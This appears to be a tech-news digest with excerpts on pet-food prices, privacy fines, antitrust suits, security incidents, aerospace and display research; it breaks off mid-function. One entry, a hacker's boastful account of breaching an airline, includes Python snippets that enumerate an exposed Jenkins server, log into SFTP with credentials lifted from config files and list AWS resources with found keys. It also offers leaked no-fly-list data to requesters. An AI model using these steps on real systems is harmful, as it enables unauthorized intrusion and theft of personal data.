Customers have been reporting steep price increases across a number of items from Royal Canin – with one saying the price of her pet food had increased by £15 for a 10kg bag in less than a year.
Zooplus, an online pet food seller that stocks Royal Canin – among other brands – said it did not want to pass these price increases on to its customers, branding them “excessive”, and saying “value for money is important to us”.
The German retailer said customers may find it difficult to buy Royal Canin products from its site, as it has limited the number of items each household can purchase.
Meta’s (META.O) WhatsApp subsidiary was fined 5.5 million euros ($5.95 million) on Thursday by Ireland’s Data Protection Commission (DPC), its lead EU privacy regulator, for an additional breach of the bloc’s privacy laws.
The DPC also told WhatsApp to reassess how it uses personal data for service improvements, following a similar order it issued this month to Meta’s other main platforms, Facebook and Instagram, which required Meta to reassess the legal basis on which it targets advertising using personal data.
Microsoft wants to know how many out-of-support copies of Office are installed on Windows PCs, and it intends to find out by pushing a patch through Microsoft Update that it swears is safe, not that you asked.
Quietly mentioned in a support post this week, update KB5021751 targets versions of Office “including” 2007 and 2010, both of which have been out of support for several years. Office 2013 is also included, as it’s due to lose support this coming April.
“This update will run one time silently without installing anything on the user’s device,” Microsoft said, followed by instructions on how to download and install the update, which Microsoft said has been scanned to ensure it’s not infected by malware.
[…]
Microsoft’s description of its out-of-support Office census update leaves much to the imagination, including whether the paragraph describing installation of the update, which directly contradicts the paragraph above it, is simply misplaced boilerplate that doesn’t apply to KB5021751.
Also missing is any explanation of how the update will gather information on Office installations, whether it collects any other system information, or what exactly will be transmitted to and stored by Microsoft.
Because the nature of the update is unclear, it’s also unknown what may be left behind after it runs. Microsoft said it is a single-run, silent process, but did not say whether the update leaves any traces behind.
Thousands of people who use Norton password manager began receiving emailed notices this month alerting them that an unauthorized party may have gained access to their personal information along with the passwords they have stored in their vaults.
Gen Digital, Norton’s parent company, said the security incident was the result of a credential-stuffing attack rather than an actual breach of the company’s internal systems. Gen’s portfolio of cybersecurity services has a combined user base of 500 million users — of which about 925,000 active and inactive users, including approximately 8,000 password manager users, may have been targeted in the attack, a Gen spokesperson told CNET via email.
[…]
Norton’s intrusion detection systems detected an unusual number of failed login attempts on Dec. 12, the company said in its notice. On further investigation, around Dec. 22, Norton was able to determine that the attack began around Dec. 1.
“Norton promptly notified both regulators and customers as soon as the team was able to confirm that data was accessed in the attack,” Gen’s spokesperson said.
Personal data that may have been compromised includes Norton users’ full names, phone numbers and mailing addresses. Norton also said it “cannot rule out” that password manager vault data including users’ usernames and passwords were compromised in the attack.
“Systems have not been compromised, and they are safe and operational, but as is all too commonplace in today’s world, bad actors may take credentials found elsewhere, like the Dark Web, and create automated attacks to gain access to other unrelated accounts,” Gen’s spokesperson said.
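Credential stuffing tends to show up in logs as exactly the signal Norton described: a spike of failed logins fanning out across many accounts from a shared set of sources. Here is a minimal illustrative sketch of that kind of flagging (not Norton’s actual detection logic; the thresholds and field names are assumptions):

```python
# Illustrative thresholds; a real system tunes these against its traffic baseline.
FAILED_LOGINS_PER_HOUR = 1000   # service-wide spike trigger
ACCOUNTS_PER_IP = 50            # distinct accounts attempted from a single IP

def flag_credential_stuffing(failed_logins):
    """failed_logins: list of (source_ip, account_id) pairs from one hour of logs."""
    if len(failed_logins) < FAILED_LOGINS_PER_HOUR:
        return []
    accounts_by_ip = {}
    for ip, account in failed_logins:
        accounts_by_ip.setdefault(ip, set()).add(account)
    # Stuffing fans out: one source replaying leaked credentials across many accounts.
    return [ip for ip, accounts in accounts_by_ip.items()
            if len(accounts) > ACCOUNTS_PER_IP]
```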
The Department of Justice filed a lawsuit against Google Tuesday, accusing the tech giant of using its market power to create a monopoly in the digital advertising business over the course of 15 years.
Google “corrupted legitimate competition in the ad tech industry by engaging in a systematic campaign to seize control of the wide swath of high-tech tools used by publishers, advertisers and brokers, to facilitate digital advertising,” the Justice Department alleges. Eight state attorneys general joined in the suit, filed in Virginia federal court. Google has faced five antitrust suits since 2020.
Secondhand MacBooks that retailed for as much as $3,000 are being turned into parts because recyclers have no way to log in and factory reset the machines, which are often just a couple of years old.
“How many of you out there would like a 2-year-old M1 MacBook? Well, too bad, because your local recycler just took out all the Activation Locked logic boards and ground them into carcinogenic dust,” John Bumstead, a MacBook refurbisher and owner of the RDKL INC repair store, said in a recent tweet.
The problem is Apple’s T2 security chip. First introduced in 2018, the chip makes it impossible for anyone who isn’t the original owner to log into the machine. It’s a boon for security and privacy and a plague on the secondhand market. “Like it has been for years with recyclers and millions of iPhones and iPads, it’s pretty much game over with MacBooks now—there’s just nothing to do about it if a device is locked,” Bumstead told Motherboard. “Even the jailbreakers/bypassers don’t have a solution, and they probably won’t because Apple proprietary chips are so relatively formidable.” When Apple released its own silicon with the M1, it integrated the features of the T2 into those computers.
[…]
Bumstead told Motherboard that every year Apple makes life a little harder for the secondhand market. “The progression has been, first you had certifications with unrealistic data destruction requirements, and that caused recyclers to pull drives from machines and sell without drives, but then as of 2016 the drives were embedded in the boards, so they started pulling boards instead,” he said. “And now the boards are locked, so they are essentially worthless. You can’t even boot locked 2018+ MacBooks to an external device because by default the MacBook security app disables external booting.”
Motherboard first reported on this problem in 2020, but Bumstead said it’s gotten worse recently. “Now we’re seeing quantity come through because companies with internal 3-year product cycles are starting to dump their 2018/2019s, and inevitably a lot of those are locked,” he said.
[…]
Bumstead offered some solutions to the problem. “When we come upon a locked machine that was legally acquired, we should be able to log into our Apple account, enter the serial and any given information, then click a button and submit the machine to Apple for unlocking,” he said. “Then Apple could explore its records, query the original owner if it wants, but then at the end of the day if there are no red flags and the original owner does not protest within 30 days, the device should be auto-unlocked.”
Android users in India will soon have more control over their devices, thanks to a court ruling. Beginning next month, Indian Android wielders can choose a different billing system when paying for apps and in-app smartphone purchases rather than default to going through the Play Store. Google will also allow Indian users to select a different search engine as their default right as they set up a new device, which might have implications for upcoming EU regulations.
The move comes after a ruling last week by India’s Supreme Court. The case began late last year, when the Competition Commission of India (CCI) fined Google $161 million for imposing restrictions on its manufacturing partners. Google challenged the order, maintaining that this kind of practice would stall the Android ecosystem and that “no other jurisdiction has ever asked for such far-reaching changes.”
[…]
Google also won’t be able to require the installation of its branded apps as a condition of licensing the Android OS anymore. From now on, device manufacturers in India will be able to license “individual Google apps” as they like for pre-installation rather than needing to bundle the whole kit and caboodle. Google is also updating Android’s compatibility requirements so that its OEM partners can “build non-compatible or forked variants.”
[…]
Of particular note is seeing how users will react to being able to choose whether to buy apps and other in-app purchases through the Play Store, where Google takes a 30% cut from each transaction, or through an alternative billing service like JIO Money or Paytm—or even Amazon Pay, available in India.
[…]
The Department of Justice in the United States is also suing Google’s parent company, Alphabet, this week, its second antitrust suit against the company, over practices within its digital advertising business, alleging that the company “corrupted legitimate competition in the ad tech industry” to build out its monopoly.
note: this is a slightly more technical* and comedic write up of the story covered by my friends over at dailydot, which you can read here
*i say slightly since there isnt a whole lot of complicated technical stuff going on here in the first place
step 1: boredom
like so many other of my hacks this story starts with me being bored and browsing shodan (or well, technically zoomeye, chinese shodan), looking for exposed jenkins servers that may contain some interesting goods. at this point i’ve probably clicked through about 20 boring exposed servers with very little of any interest, when i suddenly start seeing some familiar words. “ACARS“, lots of mentions of “crew” and so on. lots of words i’ve heard before, most likely while binge watching Mentour Pilot YouTube videos. jackpot. an exposed jenkins server belonging to CommuteAir.
step 2: how much access do we have really?
ok but let’s not get too excited too quickly. just because we have found a funky jenkins server doesn’t mean we’ll have access to much more than build logs. it quickly turns out that while we don’t have anonymous admin access (yes that’s quite frequently the case [god i love jenkins]), we do have access to build workspaces. this means we get to see the repositories that were built for each one of the ~70 build jobs.
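for the curious: figuring out how much anonymous read access a jenkins server gives you is basically one HTTP call to its JSON API. a rough sketch of the kind of poking involved (the target url here is obviously made up):

```python
import requests

# hypothetical target url; any exposed jenkins instance works the same way
BASE = "https://jenkins.example-airline.com"

# the standard jenkins JSON API lists every build job if anonymous read is enabled
r = requests.get(f"{BASE}/api/json?tree=jobs[name]", timeout=10)
if r.ok:
    for job in r.json().get("jobs", []):
        # each job's workspace (the checked-out repo + build artifacts) lives here
        print(f"{BASE}/job/{job['name']}/ws/")
else:
    print("no anonymous access :(", r.status_code)
```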
step 3: let’s dig in
most of the projects here seem to be fairly small spring boot projects. the standardized project layout and extensive use of the resources directory for configuration files will be very useful in this whole endeavour.
the very first project i decide to look at in more detail is something about “ACARS incoming”, since ive heard the term acars before, and it sounds spicy. a quick look at the resource directory reveals a file called application-prod.properties (same also for -dev and -uat). it couldn’t just be that easy now, could it?
well, it sure is! two minutes after finding said file im staring at filezilla connected to a navtech sftp server filled with incoming and outgoing ACARS messages. this aviation shit really do get serious.
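to illustrate why this pattern is so deadly: spring boot convention puts per-environment config in plain .properties files, and all it takes is reading three keys out of one. the key names and values below are invented, and paramiko is just one way to do the sftp part:

```python
import paramiko

# parse java-style key=value .properties lines into a dict
props = {}
with open("application-prod.properties") as f:
    for line in f:
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, _, value = line.partition("=")
            props[key.strip()] = value.strip()

# e.g. sftp.host=..., sftp.username=..., sftp.password=... sitting there in plaintext
transport = paramiko.Transport((props["sftp.host"], 22))
transport.connect(username=props["sftp.username"], password=props["sftp.password"])
sftp = paramiko.SFTPClient.from_transport(transport)
print(sftp.listdir("."))  # in our case: dirs of incoming/outgoing ACARS messages
```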
here is a sample of a departure ACARS message:
from here on i started trying to find journalists interested in a probably pretty broad breach of US aviation. which unfortunately got peoples hopes up in thinking i was behind the TSA problems and groundings a day earlier, but unfortunately im not quite that cool. so while i was waiting for someone to respond to my call for journalists i just kept digging, and oh the things i found.
as i kept looking at more and more config files in more and more of the projects, it dawned on me just how heavily i had already owned them within just half an hour or so. hardcoded credentials there would allow me access to navblue apis for refueling, cancelling and updating flights, swapping out crew members and so on (assuming i was willing to ever interact with a SOAP api in my life which i sure as hell am not).
i however kept looking back at the two projects named noflycomparison and noflycomparisonv2, which seemingly take the TSA nofly list and check if any of commuteair’s crew members have ended up there. there are hardcoded credentials and s3 bucket names, however i just cant find the actual list itself anywhere. probably partially because it seemingly always gets deleted immediately after processing it, most likely specifically because of nosy kittens like me.
fast forward a few hours and im now talking to Mikael Thalen, a staff writer at dailydot. i give him a quick rundown of what i have found so far and how in the meantime, just half an hour before we started talking, i have ended up finding AWS credentials. i now seemingly have access to pretty much their entire aws infrastructure via aws-cli. numerous s3 buckets, dozens of dynamodb tables, as well as various servers and much more. commute really loves aws.
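once you have working keys, enumerating what they can touch is a couple of boto3 calls, the library equivalent of poking around with aws-cli (what comes back is obviously specific to the victim):

```python
import boto3

# credentials are picked up from the environment/config, exactly as aws-cli does
s3 = boto3.client("s3")
for bucket in s3.list_buckets()["Buckets"]:
    print("s3 bucket:", bucket["Name"])

dynamodb = boto3.client("dynamodb")
for table in dynamodb.list_tables()["TableNames"]:
    print("dynamodb table:", table)
```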
i also share with him how close we seemingly are to actually finding the TSA nofly list, which would obviously immediately make this an even bigger story than if it were “only” a super trivially ownable airline. i had even peeked at the nofly s3 bucket at this point which was seemingly empty. so we took one last look at the noflycomparison repositories to see if there is anything in there, and for the first time actually take a peek at the test data in the repository. and there it is. three csv files, employee_information.csv, NOFLY.CSV and SELECTEE.CSV. all committed to the repository in july 2022. the nofly csv is almost 80mb in size and contains over 1.56 million rows of data. this HAS to be the real deal (we later get confirmation that it is indeed a copy of the nofly list from 2019).
holy shit, we actually have the nofly list. holy fucking bingle. what?! :3
with the jackpot found and being looked into by my journalism friends i decided to dig a little further into aws. grabbing sample documents from various s3 buckets, going through flight plans and dumping some dynamodb tables. at this point i had found pretty much all PII imaginable for each of their crew members. full names, addresses, phone numbers, passport numbers, pilot’s license numbers, when their next linecheck is due and much more. i had trip sheets for every flight, the potential to access every flight plan ever, a whole bunch of image attachments to bookings for reimbursement flights containing yet again more PII, airplane maintenance data, you name it.
i had owned them completely in less than a day, with pretty much no skill required besides the patience to sift through hundreds of shodan/zoomeye results.
so what happens next with the nofly data
while the nature of this information is sensitive, i believe it is in the public interest for this list to be made available to journalists and human rights organizations. if you are a journalist, researcher, or other party with legitimate interest, please reach out at nofly@crimew.gay. i will only give this data to parties that i believe will do the right thing with it.
note: if you email me there and i do not reply within a regular timeframe it is very likely my reply ended up in your spam folder or got lost. using email not hosted by google or msft is hell. feel free to dm me on twitter in that case.
support me
if you liked this or any of my other security research feel free to support me on my ko-fi. i am unemployed and in a rather precarious financial situation and do this research for free and for the fun of it, so anything goes a long way.
Your international money transfers might not be as discreet as you think. Senator Ron Wyden and The Wall Street Journal have learned that US law enforcement can access details of money transfers without a warrant through an obscure surveillance program the Arizona attorney general’s office created in 2014. A database stored at a nonprofit, the Transaction Record Analysis Center (TRAC), provides full names and amounts for larger transfers (above $500) sent between the US, Mexico and 22 other regions through services like Western Union, MoneyGram and Viamericas. The program covers data for numerous Caribbean and Latin American countries in addition to Canada, China, France, Malaysia, Spain, Thailand, Ukraine and the US Virgin Islands. Some domestic transfers also enter the data set.
[…]
The concern, of course, is that officials can obtain sensitive transaction details without court oversight or customers’ knowledge. An unscrupulous officer could secretly track large transfers. Wyden adds that the people in the database are more likely to be immigrants, minorities and low-income residents who don’t have bank accounts and already have fewer privacy protections. The American Civil Liberties Union also asserts that the subpoenas used to obtain this data violate federal law. Arizona issued at least 140 of these subpoenas between 2014 and 2021.
[…] In a study published Monday in the journal Biosensors and Bioelectronics, a group of researchers from Tel Aviv University (via Neuroscience News) said they recently created a robot that can identify a handful of smells with 10,000 times more sensitivity than some specialized electronics. They describe their robot as a bio-hybrid platform (read: cyborg). It features a set of antennae taken from a desert locust, connected to an electronic system that measures the electrical signal the antennae produce when they detect a smell. They paired the robot with an algorithm that learned to characterize the smells by their signal output. In this way, the team created a system that could reliably differentiate between eight “pure” odors, including geranium, lemon and marzipan, and two mixtures of different smells. The scientists say their robot could one day be used to detect drugs and explosives.
A YouTube video from Tel Aviv University claims the robot is a “scientific first,” but last June researchers from Michigan State University published research detailing a system that used surgically-altered locusts to detect cancer cells. Back in 2016, scientists also tried turning locusts into bomb-sniffing cyborgs. What can I say, after millennia of causing crop failures, the pests could finally be useful for something.
[…] The research team working with Airbus at the University of Surrey’s Advanced Technology Institute claims its nano-coating, referred to as a Multifunctional Nanobarrier Structure (MFNS), can be applied to the surfaces of equipment, including antennas, and has been shown to reduce the operating temperature of such surfaces from 120°C to 60°C (248°F to 140°F).
In its study published online, the team explains that thermal control is essential for most spaceborne equipment as heating from sunlight can cause large temperature differences across satellites that would result in mechanical stresses and possible misalignment of scientific instruments such as optical components. Paradoxically, space systems also require heat pipes to ensure minimal heating so that payloads can withstand the coldest space conditions.
[…]
The solution the team developed is a multilayer protection nanobarrier, which it says consists of a buffer layer made of poly(p-xylylene) and a diamond-like carbon superlattice layer that gives it a mechanically and environmentally ultra-stable platform.
The MFNS is deposited onto surfaces using a custom plasma-enhanced chemical vapor deposition (PECVD) system, which operates at room temperature and so can be applied to heat-sensitive substrates.
The combined layer is a dielectric and therefore electromagnetically transparent across a wide range of radio frequencies, the study states, allowing it to be used to coat antenna structures without adding “significant interference” to the signal.
[…]
According to the team, the MFNS can be modulated to provide adjustable solar absorptivity in the ultraviolet to visible part of the spectrum, while at the same time exhibiting high and stable infrared emissivity. This is achieved by controlling the optical gap of individual layers.
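The significance of that ratio can be seen from the standard radiative-equilibrium relation for a sunlit surface, αS = εσT⁴. A back-of-the-envelope check (an idealized flat-plate model, not the study’s own thermal analysis) shows that halving α/ε reproduces roughly the reported 120°C-to-60°C drop:

```python
# Radiative equilibrium of an ideal sunlit plate: alpha * S = epsilon * sigma * T^4
SOLAR_FLUX = 1361.0   # W/m^2, solar constant near Earth
SIGMA = 5.670e-8      # W/m^2/K^4, Stefan-Boltzmann constant

def equilibrium_temp_c(alpha_over_epsilon):
    t_kelvin = (alpha_over_epsilon * SOLAR_FLUX / SIGMA) ** 0.25
    return t_kelvin - 273.15

print(equilibrium_temp_c(1.0))  # ~120 C: absorptivity and emissivity equal
print(equilibrium_temp_c(0.5))  # ~58 C: alpha/epsilon halved, as a tuned coating might
```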
This adjustability extends to self-reconfiguration in orbit, if the report can be believed, achieved by balancing the UV and atomic oxygen (AO) exposure of the MFNS coating. AO is created from molecular oxygen in the upper atmosphere by UV radiation, forming AO radicals commonly found in low Earth orbit, the research adds.
As to the harvesting of heat energy, this can be achieved through the creation of highly absorbing structures with a photothermal conversion efficiency as high as 96.66 percent, according to the team. This is aided by the deposition of a nitrogen-doped DLC superlattice layer in the coating which gives rise to enhanced optical absorption across a wide spectral range.
These enhanced properties, along with advanced manufacturing methods, demonstrate that the MFNS can be a candidate for many thermal applications such as photodetectors, emitters, smart radiators, and energy harvesting used in satellite systems and beyond, the study states.
Chemical flame retardants can make us safer by preventing or slowing fires, but they’re linked to a range of unsettling health effects. To get around that concern, researchers with the U.S. Department of Agriculture have bred a new population of cotton that can self-extinguish after encountering a flame.
The team of scientists from the USDA’s Agricultural Research Service, led by Gregory N. Thyssen, bred 10 strains of cotton using alleles from 10 different parent cultivars. After creating fabrics with each of these strains, the researchers put them through burn tests and found that four of them were able to completely self-extinguish. Their work is published today in PLOS One.
[…]
These flame retardant cultivars could be a game-changer in the textile industry. Currently, efforts to make fabric flame retardant include applying chemicals that reduce a material’s ability to ignite; flame retardant chemicals have been added to many fabrics since at least the 1970s. While some have been pulled from the market, these chemicals don’t break down easily, and they can bioaccumulate in humans and animals, potentially leading to endocrine disruption, reproductive toxicity, and cancer. These new strains of cotton could be used to manufacture fabrics and products that have flame retardancy naturally baked in.
The forest carbon offsets approved by the world’s leading provider and used by Disney, Shell, Gucci and other big corporations are largely worthless and could make global heating worse, according to a new investigation.
The research into Verra, the world’s leading carbon standard for the rapidly growing $2bn (£1.6bn) voluntary offsets market, has found that, based on analysis of a significant percentage of the projects, more than 90% of their rainforest offset credits – among the most commonly used by companies – are likely to be “phantom credits” and do not represent genuine carbon reductions.
The analysis raises questions over the credits bought by a number of internationally renowned companies – some of them have labelled their products “carbon neutral”, or have told their consumers they can fly, buy new clothes or eat certain foods without making the climate crisis worse.
But doubts have been raised repeatedly over whether they are really effective.
The nine-month investigation has been undertaken by the Guardian, the German weekly Die Zeit and SourceMaterial, a non-profit investigative journalism organisation. It is based on new analysis of scientific studies of Verra’s rainforest schemes.
[…]
Verra argues that the conclusions reached by the studies are incorrect, and questions their methodology. And they point out that their work since 2009 has allowed billions of dollars to be channelled to the vital work of preserving forests.
The investigation found that:
Only a handful of Verra’s rainforest projects showed evidence of deforestation reductions, according to two studies, with further analysis indicating that 94% of the credits had no benefit to the climate.
The threat to forests had been overstated by about 400% on average for Verra projects, according to analysis of a 2022 University of Cambridge study.
Gucci, Salesforce, BHP, Shell, easyJet, Leon and the band Pearl Jam were among dozens of companies and organisations that have bought rainforest offsets approved by Verra for environmental claims.
Human rights issues are a serious concern in at least one of the offsetting projects. The Guardian visited a flagship project in Peru, and was shown videos that residents said showed their homes being cut down with chainsaws and ropes by park guards and police. They spoke of forced evictions and tensions with park authorities.
[…]
Two different groups of scientists – one internationally based, the other from Cambridge in the UK – looked at a total of about two-thirds of 87 Verra-approved active projects. A number were left out by the researchers when they felt there was not enough information available to fairly assess them.
The two studies from the international group of researchers found that just eight of the 29 Verra-approved projects where further analysis was possible showed evidence of meaningful deforestation reductions.
The journalists were able to do further analysis on those projects, comparing the estimates made by the offsetting projects with the results obtained by the scientists. The analysis indicated about 94% of the credits the projects produced should not have been approved.
Credits from 21 projects had no climate benefit, seven projects delivered between 52% and 98% less benefit than claimed under Verra’s system, and one had 80% more impact, the investigation found.
Separately, the study by the University of Cambridge team of 40 Verra projects found that while a number had stopped some deforestation, the areas were extremely small. Just four projects were responsible for three-quarters of the total forest that was protected.
The journalists again analysed these results more closely and found that, in 32 projects where it was possible to compare Verra’s claims with the study finding, baseline scenarios of forest loss appeared to be overstated by about 400%. Three projects in Madagascar have achieved excellent results and have a significant impact on the figures. If those projects are not included, the average inflation is about 950%.
[…]
Barbara Haya, the director of the Berkeley Carbon Trading Project, has been researching carbon credits for 20 years, hoping to find a way to make the system function. She said: “The implications of this analysis are huge. Companies are using credits to make claims of reducing emissions when most of these credits don’t represent emissions reductions at all.
“Rainforest protection credits are the most common type on the market at the moment. And it’s exploding, so these findings really matter. But these problems are not just limited to this credit type. These problems exist with nearly every kind of credit.
“One strategy to improve the market is to show what the problems are and really force the registries to tighten up their rules so that the market could be trusted. But I’m starting to give up on that. I started studying carbon offsets 20 years ago studying problems with protocols and programs. Here I am, 20 years later having the same conversation. We need an alternative process. The offset market is broken.”
The Defense Advanced Research Projects Agency has moved into the next phase of its Control of Revolutionary Aircraft with Novel Effectors program, or CRANE. The project is centered on an experimental uncrewed aircraft, which Aurora Flight Sciences is developing, that does not have traditional moving surfaces to control the aircraft in flight.
Aurora Flight Sciences’ CRANE design, which does not yet have an official X-plane designation or nickname, instead uses an active flow control (AFC) system to maneuver the aircraft using bursts of highly pressurized air. This technology could eventually find its way onto other military and civilian designs. It could have particularly significant implications when applied to future stealth aircraft.
A subscale wind tunnel model of Aurora Flight Sciences’ CRANE X-plane design. Aurora Flight Sciences
The Defense Advanced Research Projects Agency (DARPA) issued a press release regarding the latest developments in the CRANE program yesterday. Aurora Flight Sciences, a subsidiary of Boeing, announced it had received a Phase 2 contract to continue work on this project back on December 12, 2022.
[…]
The design that Aurora ultimately settled on was more along the lines of a conventional plane. However, it has a so-called Co-Planar Joined Wing (CJW) planform consisting of two sets of wings attached to a single center fuselage that merge together at the tips, along with a twin vertical tail arrangement. As currently designed, the drone will use “banks” of nozzles installed at various points on the wings to maneuver in the air.
A wind tunnel model of one of Aurora Flight Sciences’ initial CRANE concepts with a joined wing. Aurora Flight Sciences
A wind tunnel model showing a more recent evolution of Aurora Flight Sciences’ CRANE X-plane design. Aurora Flight Sciences
The aircraft’s main engine arrangement is not entirely clear. A chin air intake under the forward fuselage, together with a single exhaust nozzle at the rear seen in official concept art and on wind tunnel models, would seem to point to a plan to power the aircraft with a single jet engine.
[…]
Interestingly, Aurora’s design “is configured to be a modular testbed featuring replaceable outboard wings and swappable AFC effectors. The modular design allows for testing of not only Aurora’s AFC effectors but also AFC effectors of various other designs,” a company press release issued in December 2022 said. “By expanding testing capabilities beyond Aurora-designed components, the program further advances its goal to provide the confidence needed for future aircraft requirements, both military and commercial, to include AFC-enabled capabilities.”
Aurora has already done significant wind tunnel testing of subscale models with representative AFC components as part of CRANE’s Phase 1. The company, along with Lockheed Martin, was chosen to proceed to that phase of the program in 2021.
“Using a 25% scale model, Aurora conducted tests over four weeks at a wind tunnel facility in San Diego, California. In addition to 11 movable conventional control surfaces, the model featured 14 AFC banks with eight fully independent controllable AFC air supply channels,” according to a press release the company put out in May 2022.
[…]
Getting rid of traditional control surfaces inherently allows for a design to be more aerodynamic, and therefore fly in a more efficient manner, especially at higher altitudes. An aircraft with an AFC system doesn’t need the various actuators and other components to move things like ailerons and rudders, offering new ways to reduce weight and bulk.
A DARPA briefing slide showing how the designs of traditional control surfaces, at their core, have remained largely unchanged after more than a century of other aviation technology developments. DARPA
A lighter and more streamlined aircraft design using an AFC system might be capable of greater maneuverability. This could be particularly true for uncrewed types that also do not have to worry about the physical limitations of a pilot.
The elimination of so many moving parts also means fewer things that can break, improving safety and reliability. This would do away with various maintenance and logistics requirements, too. It might make a military design more resilient to battle damage and easier to fix, as well.
[…]
The CRANE program and Aurora Flight Sciences’ design are of course not the first forays into AFC technology. U.K.-headquartered BAE Systems, which was another one of the participants in CRANE’s Phase 0, has been very publicly experimenting with various AFC concepts since at least 2010. The most recent of these developments was an AFC-equipped design called MAGMA. Described by BAE as a “large model,” this aircraft actually flew, and you can read more about it here.
“Over the past several decades, the active flow control community has made significant advancements that enable the integration of active flow control technologies into advanced aircraft,” Richard Wlezein, the CRANE Program Manager at DARPA, said in a statement included in today’s press release. “We are confident about completing the design and flight test of a demonstration aircraft with AFC as the primary design consideration.”
Ammaar Reshi wrote and illustrated a children’s book in 72 hours using ChatGPT and Midjourney.
The book went viral on Twitter after it was met with intense backlash from artists.
Reshi said he respected the artists’ concerns but felt some of the anger was misdirected.
Ammaar Reshi was reading a bedtime story to his friend’s daughter when he decided he wanted to write his own.
Reshi, a product-design manager at a financial-tech company based in San Francisco, told Insider he had little experience in illustration or creative writing, so he turned to AI tools.
In December he used OpenAI’s new chatbot, ChatGPT, to write “Alice and Sparkle,” a story about a girl named Alice who wants to learn about the world of tech, and her robot friend, Sparkle. He then used Midjourney, an AI art generator, to illustrate it.
Just 72 hours later, Reshi self-published his book on Amazon’s digital bookstore. The following day, he had the paperback in his hands, made for free via another Amazon service called KDP.
“Alice and Sparkle” was meant to be a gift for his friends’ kids. (Image: Ammaar Reshi)
He said he paid nothing to create and publish the book, though he was already paying for a $30-a-month Midjourney subscription.
Impressed with the speed and results of his project, Reshi shared the experience in a Twitter thread that attracted more than 2,000 comments and 5,800 retweets.
Reshi said he initially received positive feedback from users praising his creativity. But the next day, the responses were filled with vitriol.
“There was this incredibly passionate response,” Reshi said. “At 4 a.m. I was getting woken up by my phone blowing up every two minutes with a new tweet saying things like, ‘You’re scum’ and ‘We hate you.'”
Reshi said he was shocked by the intensity of the responses for what was supposed to be a gift for the children of some friends. It was only when he started reading through them that he discovered he had landed himself in the middle of a much larger debate.
Artists accused him of theft
Reshi’s book touched a nerve with some artists who argue that AI art generators are stealing their work.
Some artists claim their art has been used to train AI image generators like Midjourney without their permission. Users can enter artists’ names as prompts to generate art in their style.
Lensa AI, a photo-editing tool, went viral on social media last year after it launched an update that used AI to transform users’ selfies into works of art, leading artists to highlight their concerns about AI programs taking inspiration from their work without permission or payment.
“I had not read up on the issues,” Reshi said. “I realized that Lensa had actually caused this whole thing with that being a very mainstream app. It had spread that debate, and I was just getting a ton of hate for it.”
“I was just shocked, and honestly I didn’t really know how to deal with it,” he said.
Among the nasty messages, Reshi said he found people with reasonable and valid concerns.
“Those are the people I wanted to engage with,” he said. “I wanted a different perspective. I think it’s very easy to be caught up in your bubble in San Francisco and Silicon Valley, where you think this is making leaps, but I wanted to hear from people who thought otherwise.”
After learning more, he added to his Twitter thread saying that artists should be involved in the creation of AI image generators and that their “talent, skill, hard work to get there needs to be respected.”
He said he thinks some of the hate was misdirected at his one-off project, when Midjourney allows users to “generate as much art as they want.”
Reshi’s book was briefly removed from Amazon — he said Amazon paused its sales from January 6 to January 14, citing “suspicious review activity,” which he attributed to the volume of both five- and one-star reviews. He had sold 841 copies before it was removed.
Midjourney’s founder, David Holz, told Insider: “Very few images made on our service are used commercially. It’s almost entirely for personal use.”
He said that data for all AI systems are “sourced from broadly spidering the internet,” and most of the data in Midjourney’s model are “just photos.”
A creative process
Reshi said the project was never about claiming authorship over the book.
“I wouldn’t even call myself the author,” he said. “The AI is essentially the ghostwriter, and the other AI is the illustrator.”
But he did think the process was a creative one. He said he spent hours tweaking the prompts in Midjourney to try to achieve consistent illustrations.
Despite successfully creating an image of his heroine, Alice, to appear throughout the book, he wasn’t able to do the same for her robot friend. He had to use a picture of a different robot each time it appeared.
“It was impossible to get Sparkle the robot to look the same,” he said. “It got to a point where I had to include a line in the book that says Sparkle can turn into all kinds of robot shapes.”
Reshi’s children’s book stirred up anger on Twitter. (Image: Ammaar Reshi)
Some people also attacked the quality of the book’s writing and illustrations.
“The writing is stiff and has no voice whatsoever,” one Amazon reviewer said. “And the art — wow — so bad it hurts. Tangents all over the place, strange fingers on every page, and inconsistencies to the point where it feels like these images are barely a step above random.”
Reshi said he would be hesitant to put out an illustrated book again, but he would like to try other projects with AI.
“I’d use ChatGPT for instance,” he said, saying there seem to be fewer concerns around content ownership than with AI image generators.
The goal of the project was always to gift the book to the two children of his friends, who both liked it, Reshi added.
“It worked with the people I intended, which was great,” he said.
European researchers have successfully tested a system that uses terawatt-level laser pulses to steer lightning toward a 26-foot rod. Unlike a conventional lightning rod, the system is not limited by its physical height, and it can cover much wider areas — in this case, 590 feet — while penetrating clouds and fog.
The design ionizes nitrogen and oxygen molecules, releasing electrons and creating a plasma that conducts electricity. As the laser fires at a very quick 1,000 pulses per second, it’s considerably more likely to intercept lightning as it forms. In the test, conducted between June and September 2021, lightning followed the beam for nearly 197 feet before hitting the rod.
[…]
The University of Glasgow’s Matteo Clerici, who didn’t work on the project, noted to The Journal that the laser in the experiment costs about $2.17 million. The researchers also plan to significantly extend the range, to the point where a 33-foot rod would have an effective coverage of 1,640 feet.
[…] Nanosys, a company whose quantum dot technology is in millions of TVs, offered to show me a top-secret prototype of a next-generation display. Not just any next-gen display, but one I’ve been writing about for years and which has the potential to dethrone OLED as the king of displays.
[…]
Electroluminescent quantum dots. These are even more advanced than the quantum dots found in today’s TVs, and they could eventually replace LCD and OLED in phones and TVs. They promise improved picture quality, energy savings and manufacturing efficiency. A simpler structure makes these displays theoretically so easy to produce that they could usher in a sci-fi world of inexpensive screens on everything from eyeglasses to windscreens and windows.
[…]
Quantum dots are tiny particles that, when supplied with energy, emit specific wavelengths of light. Different-sized quantum dots emit different wavelengths. Or to put it another way, some dots emit red light, others green, and others still, blue.
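The physics behind that size-to-color mapping is quantum confinement: squeezing the excited electron-hole pair into a smaller dot raises its emission energy roughly as 1/R². Here is a toy estimate using the widely cited Brus approximation (textbook CdSe parameters, Coulomb correction ignored, so the outputs are illustrative only):

```python
# Toy Brus-model estimate: emission energy rises ~1/R^2 as the dot shrinks
H = 6.626e-34        # Planck constant, J*s
C = 2.998e8          # speed of light, m/s
M0 = 9.109e-31       # electron rest mass, kg
EV = 1.602e-19       # joules per eV

E_GAP = 1.74         # eV, bulk CdSe band gap (textbook value)
ME, MH = 0.13, 0.45  # CdSe effective electron/hole masses, in units of M0

def emission_wavelength_nm(radius_nm):
    r = radius_nm * 1e-9
    confinement_ev = (H**2 / (8 * r**2 * M0)) * (1 / ME + 1 / MH) / EV
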